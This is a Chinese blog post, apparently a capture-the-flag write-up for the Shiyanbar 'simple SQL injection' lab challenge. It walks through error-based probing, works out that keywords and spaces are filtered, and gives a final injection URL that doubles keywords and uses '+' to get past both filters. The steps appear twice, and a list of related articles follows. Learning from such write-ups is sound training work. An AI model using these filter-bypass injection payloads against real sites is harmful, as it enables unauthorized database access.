实验吧简单的sql注入解题思路
2017-03-17 21:20
225 查看
解题思路:研究了好久,看了writeup才知道
1)在文本框输入1,提交,链接变成id=1
2)在文件框输入1‘,提交,报错,判断存在注入。
3)初步预计后台表为flag,字段名为flag,需要构造union select flag from flag来执行。
4)根据第二步的报错信息看,多加个‘,后面的语句需要再构造一个条件来结束’,注入语句为:1‘ union select flag from flag where ‘t’=’t
执行后报错:heck the manual that corresponds to your MySQL server version for the right syntax to use near ‘flag flag ‘t’=’t” at line 1
分析:根据错误信息发现只有变量了,其他的关键字都被过滤了。
5)把关键字写2遍提交,发现如下报错: corresponds to your MySQL server version for the right syntax to use near ‘unionselectflag fromflag where’t’=’t” at line 1
分析:发现空格被过滤了
6))使用+号在空格之前连接:
http://ctf5.shiyanbar.com/423/web/?id=1 ‘+unionunion +selectselect +flag+fromfrom +flag+wherewhere+’t’=’t
得到KEY:flag{xxxxxx}
1)在文本框输入1,提交,链接变成id=1
2)在文件框输入1‘,提交,报错,判断存在注入。
3)初步预计后台表为flag,字段名为flag,需要构造union select flag from flag来执行。
4)根据第二步的报错信息看,多加个‘,后面的语句需要再构造一个条件来结束’,注入语句为:1‘ union select flag from flag where ‘t’=’t
执行后报错:heck the manual that corresponds to your MySQL server version for the right syntax to use near ‘flag flag ‘t’=’t” at line 1
分析:根据错误信息发现只有变量了,其他的关键字都被过滤了。
5)把关键字写2遍提交,发现如下报错: corresponds to your MySQL server version for the right syntax to use near ‘unionselectflag fromflag where’t’=’t” at line 1
分析:发现空格被过滤了
6))使用+号在空格之前连接:
http://ctf5.shiyanbar.com/423/web/?id=1 ‘+unionunion +selectselect +flag+fromfrom +flag+wherewhere+’t’=’t
得到KEY:flag{xxxxxx}
相关文章推荐
- 实验吧三道sql注入题目解题思路以及当中至少点整理(简单的SQL注入、简单的SQL注入2、简单的SQL注入)
- 实验吧简单的sql注入--三题答案一样--_--
- 【HDU4313】Matrix 多校 解题报告+AC代码+思路+算法正确性证明,此为Kruskal贪心简单版本,恶心版本稍后放出【目标达成 0.2%】
- 【HDU4313】Matrix 多校 解题报告+AC代码+思路+算法正确性证明,此为Kruskal贪心恶心版本,非自虐倾向慎入!建议想找解题报告的童鞋看简单版本的,这个我写给自己【目标达成 0.2%】
- 一个全文检索的简单需求,想用lucene,大家看看,提提思路
- 简单工作流的基本设计思路
- 话说解题思路
- 简单sql注入防范
- 今天用ACCESS简单研究了一下简单人工智能聊天程序的设计思路
- 防止sql注入的简单方法
- SQL注入不完全思路与防注入程序
- 基于Ant+Velocity的简单代码生成器的思路与实现
- SQL注入不完全思路与防注入程序
- SQL注入不完全思路与防注入程序(忘记出处了=.=!)
- C# 一个简单分词程序的思路和代码(三) 键树 插入记录
- 基于Ant+Velocity的简单代码生成器的思路与实现
- 话说解题思路
- SQL注入与ASP木马上传的又一思路
- 基于Ant+Velocity的简单代码生成器的思路与实现
- C# 一个简单分词程序的思路和代码(二) 键树